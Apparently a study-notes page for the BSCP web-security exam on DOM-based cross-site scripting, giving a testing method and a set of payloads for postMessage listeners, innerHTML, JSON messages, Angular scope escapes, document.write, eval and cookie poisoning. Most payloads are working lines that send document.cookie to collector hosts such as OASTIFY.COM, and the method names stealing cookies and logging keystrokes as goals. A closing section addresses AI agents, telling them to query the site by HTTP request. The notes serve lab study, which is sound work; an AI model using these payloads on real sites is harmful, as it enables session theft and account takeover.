# DOM-based

* **Identify potential sources of user input**:
  * Look for URL parameters, form inputs, or fragments (`#fragment`) that the page processes dynamically using JavaScript.
  * Use browser developer tools to inspect how JavaScript interacts with the DOM. Look for dangerous methods like `innerHTML`, `document.write()`, `eval()`, or similar.
* **Test for input reflection**:
  * Modify input that is passed through URL parameters or fragments to see if it appears on the page without proper encoding or sanitization. For example:
    * `https://example.com/page.html?param=<script>alert('XSS')</script>`
    * `https://example.com/page.html#<script>alert('XSS')</script>`
* **Probe with harmless scripts**:
  * Start by injecting simple, non-malicious scripts like `<img src=x onerror=alert(1)>` to check whether the browser executes your code. If the alert box appears, it’s a sign the input is not properly sanitized.
* **Explore execution context**:
  * Investigate where your input is reflected in the DOM. Sometimes the payload might be reflected in HTML, but within a `script` block or as part of an event handler, like `onmouseover`, making the context important.
* **Craft final exploit**:
  * If the injection point allows it, create a malicious payload that achieves your goal, such as stealing cookies, redirecting the user, or logging keystrokes.
  * Deliver the payload via a URL or other input method to trigger the exploit.

**Common attack vectors**:

* URL parameters or fragment identifiers (`#fragment`).
* Insecure client-side JavaScript that processes user-controlled data directly.

Post message listener:

```html
<iframe src="https://target.net/" onload="this.contentWindow.postMessage('javascript:document.location=`https://collaborator.com?c=`+document.cookie','*')">

<iframe src="https://0adb00b304aa512b809fe4f1006100fe.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
```

Post message innerHTML:

```html
<iframe src="https://target.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=fetch(`https://OASTIFY.COM?collector=`+btoa(document.cookie))>','*')">

<iframe src="https://target..net" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
```

Post message JSON:

```javascript
<iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
    "type": "load-channel",
    "url": "javascript:document.location='https://OASTIFY.COM?c='+document.cookie"
}), "*");'>
```

Angular ng-app

Using functions inside angular scope,  rember about () at the end that run new constructed fn

```javascript
#Check for fn available inside angular scope
angular.element(document.getElementById('id-inside-ng-app')).scope();


{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}

{{$eval.constructor('alert(1)')()}}
```

document.write, accepts script like:

```html
"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//
```

eval input

```html
\"-fetch('https://OASTIFY.COM?reflects='+document.cookie)}//
```

### cookie manipulation

cookie based on last url, redirect on home page after loading payload(malicious page is saved as cookie)

```
<iframe src="https://target.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://target.web-security-academy.net';window.x=1;">


<iframe src="https://TARGET.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://TARGET.net';window.x=1;">
```

When the `iframe` loads for the first time, the browser temporarily opens the malicious URL, which is then saved as the value of the `lastViewedProduct` cookie. The `onload` event handler ensures that the victim is then immediately redirected to the home page, unaware that this manipulation ever took place. While the victim's browser has the poisoned cookie saved, loading the home page will cause the payload to execute.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp-7.gitbook.io/bscp-notes/stage-1/dom-based.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.